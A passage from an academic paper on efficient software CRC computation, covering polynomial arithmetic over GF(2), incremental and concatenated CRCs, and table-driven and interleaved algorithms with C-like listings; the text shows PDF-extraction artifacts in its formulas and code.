value\nM=N\u00001X\nk=0mk2N\u00001\u0000k\nor as a polynomial of a single variable of degree ( N\u00001)\nM(x) =N\u00001X\nk=0mkxN\u00001\u0000k\nwhere mk2GF(2) =f0;1gand all arithmetic operations on coe\u000ecients are\nperformed modulo 2. For example,\nAddition: ( x3+x2+x+ 1) + ( x2+x+ 1) = x3+ 2x2+ 2x+ 2 = x3;\nSubtraction: ( x3+x+ 1)\u0000(x2+x) =x3\u0000x2+ 1 = x3+x2+ 1;\nMultiplication: ( x+ 1)( x+ 1) = x2+ 2x+ 1 = x2+ 1:\nFor a given polynomial P(x) of degree D= deg\u0000\nP(x)\u0001\n, CRC u\u0000\nM(x); v(x)\u0001\nis the reminder from division of\u0000\nM(x)\u0001xD\u0001\nbyP(x). In practice, a more\n2complex formula is used:\nCRC u\u0000\nM(x); v(x)\u0001\n=\u0010\u0000\nv(x)\u0000u(x)\u0001\n\u0001xjMj+M(x)\u0001xD+u(x)\u0011\nmodP(x);\n(1)\nwhere polynomial P(x) of degree Dand polynomial u(x) of degree less than D\nare \fxed.\nThe use of the non-zero value of u(x) guarantees that the CRC of a sequence\nof zeroes is di\u000berent from zero. That allows detection of insertion of zeroes in\nthe beginning of a message and replacement of both content of the message and\nits CRC value with zeroes. Typically,\nu(x) =D\u00001X\nk=0xk: (2)\nThe use of auxilary parameter v(x) allows incremental CRC computation as\nshown in section 3.1.\n2 Related work\nCyclic Redundancy Checks (CRCs) were proposed by Peterson and Brown\n[PB61] in 1961. An e\u000ecient table-driven software implementation which reads\nand processes data byte by byte was described by Hill [Hil79] in 1979, Perez\n[Per83] in 1983. The \\classic\" byte-by-byte CRC algorithm described in section\n4.6 was published by Sarwate [Sar88] in 1988.\nIn 1993, Black [Bla93] published a method that reads data by words (de-\nscribed in section 4.8); however, it still computes the CRC byte by byte in strong\nsequential order.\nIn 2001, Braun and Waldvogel [BW01] brie\ry outlined a specialized vari-\nant of a CRC that could read input data by words and process them byte by\nbyte { but, thanks to the use of multiple tables, di\u000berent bytes from the input\nword could be processed in parallel. In 2002, Ji and Killian [JK02] provided de-\ntailed description and analysis of a nearly identical scheme. Both solutions were\ntargeted for hardware implementation. In 2005, Kouvanis and Berry [KB05]\ndemonstrated clear performance bene\fts of this scheme even when it is im-\nplemented in software. A generalized version of this approach is described in\nsection 4.9.\nSurprisingly, until [GGO+10] we have not seen prior art describing or utiliz-\ning a method of computing a CRC by processing in parallel (in an interleaved\nmanner to utilize multiple ALUs) multiple input streams belonging to non-\noverlapping sections of input data, desribed in section 4.10.\nA novel method of CRC computation that processes in parallel multiple\nwords belonging to overlapping sections of input data is described in section\n4.11. A special case restricted to the use of 64-bit tables, 64-bit reads, and 32\n3or 64-bit generating polynomials was implemented by the authors in February-\nMarch 2007 and was used by a couple of Microsoft products. In 2009, the\nalgorithm was generalized and these limitations were removed.\nThe fact that the CRC of a message followed by its CRC is a constant value\nwhich does not depend on the message, described in section 3.5, is well known\nand has been widely used in the telecommunication industry for long time.\nA method of storing a carefully chosen sequence of bits after a message so\nthat the CRC of a message and the sequence of bits appended to the mes-\nsage produces prede\fned result, described in 3.5, was implemented in 1990 by\nZemtsov [Zem90].\nA method for recomputing a known CRC using a new initial CRC value,\ndescribed in section 3.2, and the method of computing a CRC of the concatena-\ntion of messages having known CRC values without touching the actual data,\ndescribed in section 3.3, were implemented by one of the authors in 2005 but\nwere not published.\n3 CRC tricks and tips\n3.1 Incremental CRC computation\nThe use of an arbitrary initial CRC value v(x) allows computation of a CRC\nincrementally. If a message M(x) =M1(x)\u0001xjM2j+M2(x) is a concatenation\nof messages M1andM2, its CRC may be computed piece by piece because\nCRC u\u0000\nM(x); v(x)\u0001\n= CRC u\u0010\nM2(x);CRC u\u0000\nM1(x); v(x)\u0001\u0011\n: (3)\nIndeed,\nCRC u(M; v) =\u0000\n(v\u0000u)xjMj+MxD+u\u0001\nmodP=\n=\u0000\n(v\u0000u)xjM1j+jM2j+ (M1xjM2j+M2)xD+u\u0001\nmodP=\n=\u0010\u0000\n(v\u0000u)xjM1j+M1xD\u0001\nxjM2j+M2xD+u\u0011\nmodP=\n=\u0000\nCRC u(M1; v)xjM2j+M2xD+u\u0001\nmodP=\n= CRC u\u0000\nM2;CRC u(M1; v)\u0001\n3.2 Changing initial CRC value\nIf CRC u\u0000\nM(x); v(x)\u0001\nfor some initial value v(x) is known, it is possible to\ncompute CRC u\u0000\nM(x); v0(x)\u0001\nfor di\u000berent initial value v0(x) without touching\nthe value of M(x):\nCRC u(M; v0) = CRC u(M; v) +\u0010\n(v0\u0000v)xjMj\u0011\nmodP: (4)\n4Proof:\nCRC u(M; v0) =\u0000\n(v0\u0000u)xjMj+MxD+u\u0001\nmodP=\n=\u0010\u0000\n(v0\u0000u) + (v\u0000v)\u0001\nxjMj+MxD+u\u0011\nmodP=\n=\u0010\u0000\n(v\u0000u) + (v0\u0000v)\u0001\nxjMj+MxD+u\u0011\nmodP=\n=\u0010\u0000\n(v\u0000u)xjMj+MxD+u\u0001\n+ (v0\u0000v)xjMj\u0011\nmodP=\n= CRC u(M; v) +\u0010\n(v0\u0000v)xjMjmodP\u0011\n:\n3.3 Concatenation of CRCs\nIf a message M(x) =M1(x)\u0001xjM2j+M2(x) is a concatenation of messages\nM1andM2, and CRCs of M1,M2(computed with some initial values v1(x),\nv2(x) respectively) are known, CRC u\u0000\nM(x); v(x)\u0001\nmay be computed without\ntouching contents of the message M:\n1. Using formula (4), the value of v0\n1= CRC u(M1; v) may be computed from\nthe known CRC u(M1; v1) without touching the contents of M1.\n2. Then, v0\n2= CRC u(M2; v0\n1) may be computed from known CRC u(M2; v2)\nwithout touching the contents of M2.\nAccording to (3), CRC u(M; v) =v0\n2.\n3.4 In-place modi\fcation of CRC-ed message\nSometimes it is necessary to replace a part of message M(x) in-place and re-\ncompute CRC of modi\fed message M(x) e\u000eciently.\nIf a message M=ABC is a concatenation of messages A,B, and C, and\nB0(x) is new message of the same length as B(x), CRC u(M0) of message M0=\nAB0Cmay be computed from known CRC u(M). Indeed,\nM(x) =A(x)\u0001xjBj+jCj+B(x)\u0001xjCj+C(x);\nM0(x) =A(x)\u0001xjBj+jCj+B0(x)\u0001xjCj+C(x) =\n=M(x) +\u0000\nB0(x)\u0000B(x)\u0001\n\u0001xjCj;\ntherefore\nCRC u\u0000\nM0(x); v(x)\u0001\n=\n= CRC u\u0010\nM(x) +\u0000\nB0(x)\u0000B(x)\u0001\n\u0001xjCj\u0011\n=\n=\u0010\u0000\nv(x)\u0000u(x)\u0001\nxjMj+M(x)xD+\u0000\nB0(x)\u0000B(x)\u0001\nxjCj+D+u(x)\u0011\nmodP(x)\n=\u0010\nCRC u\u0000\nM(x); v(x)\u0001\n+\u0000\nB0(x)\u0000B(x)\u0001\nxjCj+D\u0011\nmodP(x) =\n= CRC u\u0000\nM(x); v(x)\u0001\n+\u0010\u0000\nB0(x)\u0000B(x)\u0001\nxjCj+DmodP(x)\u0011\n:\n5It is easy to see that\nCRC u\u0000\nB0(x); v(x)\u0001\n\u0000CRC u\u0000\nB(x); v(x)\u0001\n=\n=\u0000\nB0(x)\u0000B(x)\u0001\nxDmodP(x);\nso\nCRC u\u0000\nM0(x); v(x)\u0001\n= CRC u\u0000\nM(x); v(x)\u0001\n+ \u0001\nwhere\n\u0001 =\u0010\nCRC u\u0000\nB0(x); v(x)\u0001\n\u0000CRC u\u0000\nB(x); v(x)\u0001\u0011\nxjCjmodP(x):\n3.5 Storing CRC value after the message\nOften Q(x) = CRC u\u0000\nM(x); v(x)\u0001\nis padded with zero bits until the nearest\nbyte or word boundary and is transmitted as a sequence of Wbits ( W\u0015D)\nright after the message M(x). This way, the transmitted message T(x) is the\nconcatenation of M(x) and Q(x) followed by ( W\u0000D) zeroes, and is equal to\nT(x) =M(x)\u0001xW+Q(x)\u0001xW\u0000D:\nAccording to (1), (3) and taking into account that Q(x) +Q(x) = 0 since\npolynomial coe\u000ecient are from GF(2), CRC u\u0000\nT(x); v(x)\u0001\nis a constant value\nwhich does not depend on the contents of the message and is equal to\nCRC u\u0000\nT(x); v(x)\u0001\n=\n= CRC u\u0010\nQ(x)\u0001xW\u0000D; CRC\u0000\nM(x); v(x)\u0001\u0011\n=\n= CRC u\u0000\nQ(x)\u0001xW\u0000D; Q(x)\u0001\n=\n=\u0010\u0000\nQ(x)\u0000u(x)\u0001\n\u0001xW+Q(x)\u0001xW\u0000D\u0001xD+u(x)\u0011\nmodP(x) =\n=\u0010\nu(x)\u0000\n1\u0000xW\u0001\u0011\nmodP(x):\nA more generic solution is to store a W-bit long value after the message\nsuch that the CRC of the transmitted message is equal to a prede\fned value\nR(x) (typically R(x) = 0). The D-bit value followed by ( W\u0000D) zero bits that\nshould be stored after M(x) is\n^q\u0000\nQ(x)\u0001\n=\u0010\u0000\nR(x)\u0000u(x)\u0001\nx\u0000W\u0000\u0000\nQ(x)\u0000u(x)\u0001\u0011\nmodP(x)\nwhere x\u0000Wis the multiplicative inverse of xWmodP(x) which exists if P(x)\nis not divisble by xand may be found by the extended Euclidean algorithm\n6[Has01]:\nCRC u\u0010\n^q\u0000\nQ(x)\u0001\nxW\u0000D; CRC\u0000\nM(x); v(x)\u0001\u0011\n=\n= CRC u\u0010\n^q\u0000\nQ(x)\u0001\nxW\u0000D; Q(x)\u0011\n=\n=\u0010\u0000\nQ(x)\u0000u(x)\u0001\n\u0001xW+ ^q\u0000\nQ(x)\u0001\n\u0001xW\u0000D\u0001xD+u(x)\u0011\nmodP(x) =\n=R(x):\n4 E\u000ecient software implementation\n4.1 Mapping bitstreams to hardware registers\nFor little-endian machines (assumed from now on), the result of loading of a\nD-bit word from memory into hardware register matches the expectations: the\n0-th bit of the 0-th byte becomes the 0-th (least signi\fcant) bit of the word\ncorresponding to x(D\u00001).\nFor example, the 32-bit sequence of 4 bytes 0x01, 0x02, 0x03, 0x04 (0x04030201\nwhen loaded into a 32-bit hardware register) corresponds to the polynomial\n\u0000\nx31+x22+x15+x14+x5\u0001\n:\nAddition and subtraction of polymonials with coe\u000ecients from GF(2) is the\nbitwise XOR of their coe\u000ecients. Multiplication of a polynomial by xis achieved\nby logical right shift of register contents by 1 bit. If a shift operation causes a\ncarryover, the resulting polynomial has degree D.\nPolynomials of degree less than Dwhose coe\u000ecients are recorded using ex-\nactly Dbits irrespective of actual degree of the polynomial will be called D-\nnormalized .\nWhenever possible { and unless mentioned explicitly { all polynomials will\nbe represented in D-normalized form.\nSince the generating polynomial P(x) is of degree Dand has ( D+ 1) co-\ne\u000ecients, it does not \ft into the D-bit register. However, its most signi\fcant\ncoe\u000ecient is guaranteed to be 1 and may be implied implicitly.\n4.2 Multiplication of D-normalized polynomials\nMultiplication of two D-normalized polynomials may be accomplished by tradi-\ntional bit-by-bit, shift-and-add multiplication. This is adequate if performance\nis not a concern. Sample code is given in listing 1.\n4.3 Multiplication of unnormalized polynomial\nDuring initialization of CRC tables it may be necessary to multiply d-normalized\npolynomial v(x) of a degree d6=Dby a D-normalized polynomial. It may be\naccomplished by representing the operand as a sum of weighted polynomials of\n71 // \"a\" and \"b\" occupy D l e a s t s i g n i f i c a n t b i t s .\n2 Crc Multiply ( Crc a , Crc b) f\n3 Crc product = 0 ;\n4 Crc bPowX[D] ; // bPowX[ k ] = (b \u0003x\u0003\u0003k ) mod P\n5 bPowX [ 0 ] = b ;\n6 f o r ( i n t k = 0 ; k <D; ++k )f\n7 // I f \"a\" has non \u0000zero c o e f f i c i e n t at x \u0003\u0003k ,\n8 // add ( ( b \u0003x\u0003\u0003k ) mod P) to the r e s u l t .\n9 i f ( ( ( a & (1 <<(D\u0000k ) ) != 0) product ^= bPowX[ k ] ;\n10\n11 // Compute bPowX[ k+1] = (b \u0003\u0003x\u0003\u0003( k+1) ) mod P.\n12 i f (bPowX[ k ] & 1) f\n13 // I f degree of (bPowX[ k ] \u0003x ) i s D, then\n14 // degree of (bPowX[ k ] \u0003x\u0000P) i s l e s s than D.\n15 bPowX[ k+1] = (bPowX[ k ] >>1) ^ P;\n16ge l s ef\n17 bPowX[ k+1] = bPowX[ k ] >> 1 ;\n18g\n19g\n20 return product ;\n21g\nListing 1: Multiplication of normalized polynomials\ndegree of no more than ( D\u00001), then calling Multiply () function repeatedly as\nshown in listing 2.\n4.4 Computing powers of x\nOften (see sections 3.2, 3.3, 3.5) it is necessary to compute xNmodP(x) for\nvery large values of N. This may be accomplished in O\u0000\nlog(N)\u0001\ntime.\nConsider the binary representation of N:\nN=KX\nk=0nk2k\nwhere nk2f0;1g. Then\nxN=xPnk2k=KY\nk=0xnk2k=Y\nnk!=0x2k(5)\nand may be computed using no more than ( blog2(N)c+ 1) multiplications of\npolynomials of degree less than Dprovided known values of\nPow2k(k) =x2kmodP(x): (6)\nValues of Pow2k(k) may be computed iteratively using one multiplication\n81 // \"v\" occupies \"d\" l e a s t s i g n f i c a n t b i t s .\n2 // \"m\" occupies D l e a s t s i g n i f i c a n t b i t s .\n3 Crc MultiplyUnnormalized ( Crc v , i n t d , Crc m) f\n4 Crc r e s u l t = 0 ;\n5 while (d >D)f\n6 Crc temp = v & ((1 <<D)\u00001) ;\n7 v > >= D;\n8 d\u0000= D;\n9 // XpowN returns ( x \u0003\u0003N mod P( x ) ) .\n10 r e s u l t ^= Multiply (temp , Multiply (m, XpowN(d) ) ) ;\n11g\n12 r e s u l t ^= Multiply ( v <<(D\u0000d) , m) ;\n13 return r e s u l t ;\n14g\nListing 2: Multiplication of unnormalized polynomial\nmodP(x) per iteration:\nPow2k(0) = 0 ;\nPow2k(k+ 1) = x2k+1modP(x) =\n=x2\u00012kmodP(x) =\n=\u0010\nx2k\u00112\nmodP(x) =\n=\u0010\nPow2k(k\u00001)\u00112\nmodP(x):\n4.5 Simpli\fed CRC\nIt is su\u000ecient to be able to compute\nCRC 0\u0000\nM(x); v(x)\u0001\n=\u0010\nv(x)\u0001xjMj+M(x)\u0001xD\u0011\nmodP(x); (7)\nsince\nCRC u\u0000\nM(x); v(x)\u0001\n= CRC 0\u0000\nM(x); v(x)\u0000u(x)\u0001\n+u(x);\nCRC u\u0000\nM(x); v(x)\u0001\nof message M=M1: : : M Kmay be computed incrementally\nusing CRC 0instead of CRC u:\nv0(x) =v(x)\u0000u(x);\nvk(x) = CRC 0\u0000\nMk(x); vk\u00001(x)\u0001\n;\nCRC u(M(x); v(x)) =vK+u(x):\n4.6 Computing a CRC byte by byte\nIfM(x) isW-bit value (typically, W= 8) and deg\u0000\nv(x)\u0001\n< D, by de\fnition (7)\nCRC 0\u0000\nM(x); v(x)\u0001\n=\u0010\nv(x)\u0001xW+M(x)\u0001xD\u0011\nmodP(x):\n9When D\u0014W,\nCRC 0\u0000\nM(x); v(x)\u0001\n=\u0010\nv(x)\u0001xW+M(x)\u0001xD\u0011\nmodP(x) =\n=\u0010\u0000\nv(x)\u0001xW\u0000D+M(x)\u0001\n\u0001xD\u0011\nmodP(x); (8)\nwhich may be obtained via single lookup into precomputed table Tof size 2W\nsuch that T[i] =\u0000\ni(x)\u0001xD)\u0001\nmodP(x) since deg\u0000\nv(x)\u0001xW\u0000D+M(x)\u0001\n< W .\nD-normalized representation of v(x) occupies Dleast signi\fcant bits and is\nequal to\u0000\nv(x)\u0001xW\u0000D\u0001\nwhen viewed as W-normalized representation which is\nrequired to form W-bit index into a table of 2Wentries. Therefore, explicit\nmultiplication of v(x) byxW\u0000Din formula (8) is not required.\nWhen D\u0015W,v(x) may be represented as\nv(x) =vL(x) +vH(x)\u0001xD\u0000W\nwhere\nvH(x) =\u0016v(x)\nxD\u0000W\u0017\n; deg\u0000\nvH(x)\u0001\n< W;\nvL(x) =v(x) mod xD\u0000W; deg\u0000\nvL(x)\u0001\n< D\u0000W:\nSince deg\u0000\nvL(x)\u0001xW\u0001\n< D,\u0010\nvL(x)\u0001xW\u0011\nmodP(x) =vL(x)\u0001xW. Therefore,\nCRC 0\u0000\nM(x); v(x)\u0001\n=\n=\u0010\nv(x)\u0001xW+M(x)\u0001xD\u0011\nmodP(x) =\n=\u0010\u0000\nvL(x) +vH(x)\u0001xD\u0000W\u0001\n\u0001xW+M(x)\u0001xD\u0011\nmodP(x) =\n=\u0010\nvL(x)\u0001xW+\u0000\nvH(x) +M(x)\u0001\n\u0001xD\u0011\nmodP(x) =\n=\u0010\nvL(x)\u0001xW+\u0000\nvH(x) +M(x)\u0001\n\u0001xD\u0011\nmodP(x) =\n=\u0010\nvL(x)\u0001xW\u0011\nmodP(x) +\u0010\u0000\nvH(x) +M(x)\u0001\n\u0001xD\u0011\nmodP(x) =\n=\u0010\nvL(x)\u0001xW\u0011\n+ MulByXpowD\u0000\nvH(x) +M(x)\u0001\n; (9)\nwhere\nMulByXpowD\u0000\na(x)\u0001\n=\u0000\na(x)\u0001xD\u0001\nmodP(x): (10)\nThe value of\u0000\nvL(x)\u0001xW\u0001\nmay be computed by shifting v(x) byWbits and\ndiscarding Wcarry-over zero bits.\nSince deg\u0000\nvH(x) +M(x)\u0001\n< W , the value of MulByXpowD\u0000\nvH(x) +M(x)\u0001\nmay be obtained using precomputed table containing 2Wentries.\nThe classic table-driven, byte-by-byte CRC computation [Per83, Sar88] im-\nplementing formulas (1), (3), (8), (9), and (10) for W= 8 is given in listing\n3.\n101 Crc CrcByte ( Byte value ) f\n2 return MulByXpowD[ value ] ;\n3g\n4 Crc CrcByteByByte ( Byte \u0003data , i n t n , Crc v , Crc u) f\n5 Crc crc = v ^ u ;\n6 f o r ( i n t i = 0 ; i <n ; ++i )f\n7 Crc ByteCrc = CrcByte ( crc ^ data [ i ] ) ;\n8 crc > >= 8 ;\n9 crc ^= ByteCrc ;\n10g\n11 return ( crc ^ u) ;\n12g\n13 void InitByteTable ( ) f\n14 f o r ( i n t i = 0 ; i <256; ++i )f\n15 MulByXPowD[ i ] = MultiplyUnnormalized ( i , 8 , XpowN(D) ) ;\n16g\n17g\nListing 3: Computing CRC byte by byte\nExperience shows that computing CRC byte by byte is rather slow and,\ndepending on a compiler and input data size, takes 6 \u00008 CPU cycles per byte\non modern 64-bit CPU for D <= 64. There are two reasons for it:\n1. Reading data 8 bits at a time is not the most e\u000ecient data access method\non 64-bit CPU.\n2. Modern CPUs have multiple ALUs and may execute 3-4 instructions\nper CPU cycles provided the instructions handle independent data \rows.\nHowever, byte-by-byte CRC contains only one data \row. Futhermore,\nmost instructions use the result from the previous instruction, leading to\nCPU stalls because of result propagation delays.\n4.7 Rolling CRC\nGiven a set of messages Mk=mk: : : m k+N\u00001where mkareW-bit symbols\nandNis \fxed (i.e. each next message is obtained by removing \frst symbol\nand appending new one), Ck+1= CRC u(Mk+1; v) may be obtained from known\nCk= CRC u(Mk; v) and symbols mkandmk+Nonly, without the need to com-\npute CRC of entire message Mk+1. This property may be utilized to e\u000eciently\ncompute a set of rolling Rabin \fngerpints.\nSince Mk+1(x) =Mk(x)xW\u0000mk(x)xNW+mk+N(x),\nCk+1(x) = CRC u\u0000\nMk+1(x); v(x)\u0001\n=\n= \n\u0000\nv(x)\u0000u(x)\u0001\nxNW+u(x) +N\u00001X\nn=0mk+1+n(x)xD+W(N\u00001\u0000n)!\nmodP(x) =\n=F\u0000\nCk(x); mk+N(x)\u0001\n+G\u0000\nmk(x)\u0001\n;\n11where\nF\u0000\nCk(x); mk+N(x)\u0001\n=\u0010\nCk(x)xW+mk+N(x)xD\u0011\nmodP;\nG\u0000\nmk(x)\u0001\n=\u0010\u0000\u0000\nv(x)\u0000u(x)\u0001\nxNW+u\u0001\n(1\u0000xW)\u0000mk(x)xD+NW\u0011\nmodP\nare polynomials of degree less than D.\nG\u0000\nmk\u00001(x)\u0001\nmay be computed easily via a single lookup in a table of 2W\nentries indexed by mk.\nComputation of F\u0000\nCk(x); mk+N(x)\u0001\nmay be implemented as described in\nsection 4.6 and requires one bitwise shift, one bitwise XOR, and one lookup into\na precomputed table containing 2Wentries.\n4.8 Reading multiple bytes at a time\nOne straightforward way to speed up byte-by-byte CRC computation is to read\nW > 8 bits at once. Unfortunately, this is the path of very rapidly diminish-\ning return as the size of the MulByPowD table increases with Wexponentially.\nFrom practical perspective, it is extremely desirable to ensure that the Mul-\nByPowD table \fts into the L1 cache (32-64KB), otherwise table entry access\nlatency sharply increases from 3-4 CPU cycles (L1 cache) to 15-20 CPU (L2\ncache).\nThe value of MulByXpowD\u0000\nv(x)\u0001\nmay be computed iteratively using a\nsmaller table because\nMulByXpowD\u0000\nv(x)\u0001\n=v(x)\u0001xDmodP(x) = CRC 0\u0000\nv(x);0\u0001\n(11)\nand therefore may be computed using formulas (3) and (9) for smaller values of\nW0.\n[Bla93] provided the implementation for W= 32 and W0= 8. Our more\ngeneral implementation was faster than byte-by-byte CRC but not substentially:\nthe improvement was in 20-25% range. However, the result is still important {\nit demonstrates that reading input data per se is not a bottleneck.\n4.9 Computing a CRC word by word\nThe value of MulByXpowD\u0000\nv(x)\u0001\nmay be computed using multiple smaller ta-\nbles instead of one table. Given that deg\u0000\nv(x)\u0001\n< W ,v(x) may be represented\nas a weighted sum of polynomials vk(x) such that deg\u0000\nvk(x)\u0001\n< B:\nv(x) =K\u00001X\nk=0vk(x)\u0001x(K\u00001\u0000k)B;\nwhere K=dW=Beand\nvk(x) =\u0016v(x)\nx(K\u00001\u0000k)B\u0017\nmodxB:\n12Consequently,\nMulByXpowD\u0000\nv(x)\u0001\n=v(x)\u0001xDmodP(x) =\n= K\u00001X\nk=0vk(x)\u0001x(K\u00001\u0000k)B!\n\u0001xDmodP(x) =\n=K\u00001X\nk=0\u0010\nvk(x)\u0001x(K\u00001\u0000k)B+DmodP(x)\u0011\n=\n=K\u00001X\nk=0MulWordByXpowD\u0000\nk; vk(x)\u0001\n; (12)\nwhere the values of\nMulWordByXpowD\u0000\nk; vk(x))\u0001\n=vk(x)\u0001x(K\u00001\u0000k)B+DmodP(x) (13)\nmay be obtained using Kprecomputed tables. Given that deg\u0000\nvk(x)\u0001\n< B,\neach table should contain 2Bentries.\nA sample implementation of formulas (1), (3), (12), and (13) is given in\nlisting 4 using B= 8 and assuming that Wis a multiple of 8.\nCrcWordByWord1withW= 64 uses only 2.1-2.2 CPU cycles/byte on mod-\nern 64-bit CPUs (our implementation is somewhat faster than the one described\nin [KB05]). It solves the problem with data access and, to lesser degree, allows\ninstruction level parallelism: in the middle of the unrolled main loop of CrcOf-\nWord function the CPU may process multiple bytes in parallel.\nHowever, this solution is still imperfect { the beginning of computation con-\ntends for a single source of data (variable value ), and the end of computation\ncontends for a single destination (variable result ). Further improvement re-\nquires processing of multiple independent data streams in interleaved manner\nso that when computation of one data \row path is stalled the CPU may proceed\nwith another one.\n4.10 Processing non-overlapping blocks in parallel\nStraighforward pipepiling may be achieved by spliting the input message M(x) =\nM0(x): : : M N\u00001(x) into Nblocks Mk(x) of approximately the same size and\ncomputing CRC of each block in an interleaved manner, concatenating CRCs\nof individual blocks in the end. A sample implementation is given in listing 5.\nA tuned implementation of CrcWordByWordBlocks is capable of process-\ning data at 1.3-1.4 CPU cycles/byte on su\u000eciently large (64KB and more)\ninputs, which is noticeably better that 2.1-2.2 CPU cycles/byte delivered by\nword by word CRC computation. It is a good sign that it is a move in right\ndirection.\n1The variant presented in this paper is more general than \\slicing\" described in [KB05].\nSample implementation given in listing 4 does not include one subtle optimization imple-\nmented in [KB05] as it was found to be counter-productive.\n131 Crc CrcWord(Word value ) f\n2 Crc r e s u l t = 0 ;\n3 // Unroll t h i s loop or l e t compiler do i t .\n4 f o r ( i n t byte = 0 ; byte <s i z e o f (Word) / 8 ; ++byte ) f\n5 r e s u l t ^= MulWordByXpowD [ byte ] [ ( Byte ) value ] ;\n6 value > >= 8 ;\n7g\n8 return r e s u l t ;\n9g\n10 Crc CrcWordByWord(Word \u0003data , i n t n , Crc v , Crc u)\n11 Crc crc = v ^ u ;\n12 f o r ( i n t i = 0 ; i <n ; ++i )f\n13 Crc WordCrc = CrcWord( crc ^ data [ i ] ) ;\n14 i f ( s i z e o f ( Crc ) <= s i z e o f (Word) ) f\n15 crc = WordCrc ;\n16ge l s ef\n17 crc > >= 8 ;\n18 crc ^= WordCrc ;\n19g\n20g\n21 return ( crc ^ u) ;\n22g\n23 void InitWordTables ( ) f\n24 f o r ( i n t byte = 0 ; byte <s i z e o f (Word) / 8 ; ++byte ) f\n25 // (K \u00001\u0000k )\u0003B + D = (W /8\u00001\u0000byte )\u00038 + D = D\u00008 + W\u00008\u0003byte .\n26 Crc m = XpowN(D \u00008 + s i z e o f (Word) \u00038\u00008\u0003byte ) ;\n27 f o r ( i n t i = 0 ; i <256; ++i )f\n28 MulWordByXpowD [ byte ] [ i ] =MultiplyUnnormalized ( i , 8 , m) ;\n29g\n30g\n31g\nListing 4: Computing CRC word by word\n141 // Processes N s t r i p e s of StripeWidth words each\n2 // word by word , in an i n t e r l e a v e d manner .\n3 Crc CrcWordByWordBlocks (Word \u0003data , Crc v , Crc u) f\n4 a s s e r t (n % (N \u0003StripeWidth ) == 0) ;\n5 // Use N l o c a l v a r i a b l e s instead of the array .\n6 Crc crc [N ] ;\n7 // I n i t i a l i z e the CRC value f o r each s t r i p e .\n8 crc [ 0 ] = v ^ u ;\n9 f o r ( i n t s t r i p e = 1 ; s t r i p e <N; ++s t r i p e )\n10 crc [ i ] = 0 ^ u ;\n11 // Compute each s t r i p e ' s CRC.\n12 f o r ( i n t i = 0 ; i <StripeWidth ; ++i ) f\n13 // Compute multiple CRCs in i n t e r l e a v e d manner .\n14 Word buf [N ] ;\n15 f o r ( i n t s t r i p e = 0 ; s t r i p e <N; ++s t r i p e ) f\n16 buf [ i ] =\n17 crc [ s t r i p e ] ^ data [ i + s t r i p e \u0003StripeWidth ] ;\n18 i f (D >s i z e o f (Word) \u00038)f\n19 crc [ s t r i p e ] > >= D\u0000s i z e o f (Word) \u00038 ;\n20ge l s ef\n21 crc [ s t r i p e ] = 0 ;\n22g\n23g\n24 f o r ( i n t byte = 0 ; byte <s i z e o f (Word) / 8 ; ++byte ) f\n25 f o r ( i n t s t r i p e = 0 ; s t r i p e <N; ++s t r i p e ) f\n26 crc [ s t r i p e ] ^=\n27 MulWordByXpowD [ byte ] [ ( Byte ) buf [ s t r i p e ] ] ;\n28 buf [ s t r i p e ] > >= 8 ;\n29g\n30g\n31g\n32 // Combine s t r i p e CRCs.\n33 f o r ( i n t s t r i p e = 1 ; s t r i p e <N; ++s t r i p e ) f\n34 crc [ 0 ] = ChangeStartingValue (\n35 crc [ s t r i p e ] , StripeWidth , 0 , crc [ 0 ] ) ;\n36g\n37 return ( crc [ 0 ] ^ u) ;\n38g\nListing 5: Processing non-overlapping blocks in parallel\n15The drawbacks of this approach are obvious: it does not work well with\nsmall inputs { the cost of CRC concatentation becomes a bottleneck, { and it\nmay be susceptible to false cache collisions caused by cache line aliasing.\nIf the cost of CRC concatenation was not a problem, cache pressure could be\nmitigated with the use of very narrow stripes. The code in question, lines 33-37\nof listing 5 which combine CRCs of individual stripes, iteratively computes\ncrc0(x) = crc k(x) +\u0010\ncrc0\u0001x8SmodP(x)\u0011\nfork= 1; : : : ; N\u00001 where NandSare the number and the width of the stripes\nrespectively. It may be rearranged as\ncrc0(x) =N\u00001X\nk=0\u0010\ncrcK\u00001\u0000k\u0001x8kSmodP(x)\u0011\n:\nExplicit multiplication by x8kSmay be avoided by moving it into preset\ntables\nMulWordByXPowDk(n) = MulWordByXPowD( n)\u0001xkSmodP(x):\nthat are used to compute crc0\nk(x) = crc k(x)\u0001x8kS, so that\ncrc0(x) =N\u00001X\nk=0crc0\nk:\nUnfortunately, this approach alone does not help because\n1. It increases the memory footprint of MulWordByXPowD by factor of N.\nOnce the cumulative size of MulWordByXPowDktables exceeds the size\nof L1 cache (32-64KB), the cost of memory access to multiplication table\ndata increases from 3-4 CPU cycles to 15-20, eliminating all performance\ngains achieved by reducing the number of table operations.\n2. It is still necessary to combine all Nvalues of crc kinto crc 0at the end of\nthe CRC computation.\n4.11 Interleaved word-by-word CRC\n4.11.1 Parallelizing CRC computation\nAssume that input message Mis the concatenation of Kgroups gk, and each\ngroup gkis concatenation of N W -bit long words:\nM(x) =K\u00001X\nk=0gk(x)\u0001x(K\u00001\u0000k)NW;\ngk(x) =N\u00001X\nn=0mk;n\u0001x(N\u00001\u0000n)W:\n16Input message M(x) may be represented as\nM(x) =K\u00001X\nk=0gk(x)\u0001x(K\u00001\u0000k)NW=\n=K\u00001X\nk=0 N\u00001X\nn=0mk;n\u0001x(N\u00001\u0000n)W!\n\u0001x(K\u00001\u0000k)NW=\n=N\u00001X\nn=0 K\u00001X\nk=0mk;n\u0001x(K\u00001\u0000k)NW!\n\u0001x(N\u00001\u0000n)W=\n=N\u00001X\nn=0Mn(x)\u0001x(N\u00001\u0000n)W(14)\nwhere\nMn(x) =K\u00001X\nk=0mk;n\u0001x(K\u00001\u0000k)NW:\nIn other words, Mnis concatenation of n-thW-bit word from g0followed\nby (N\u00001)Wzero bits, then n-th word from g1followed by ( N\u00001)Wzero bits,\netc., ending up with n-th word from last group gK\u00001.\nAppending ( N\u00001)Wzero bits to Mnyields M0\nn(x) =Mn(x)\u0001x(N\u00001)W\nwhich may be viewed as the concatenation of K NW -bit groups fk:\nM0\nn(x) =Mn(x)\u0001x(N\u00001)W=K\u00001X\nk=0fk;n\u0001x(K\u00001\u0000k)NW;\nfk;n(x) =mk;n(x)\u0001x(N\u00001)W;\nso\nM(x) =N\u00001X\nn=0Mn(x)\u0001x(N\u00001\u0000n)W\n=N\u00001X\nn=0M0\nn(x)\u0001x\u0000(N\u00001)W\u0001x(N\u00001\u0000n)W\n=N\u00001X\nn=0M0\nn(x)\u0001x\u0000nW: (15)\nAccording to (3), vK;n(x) = CRC 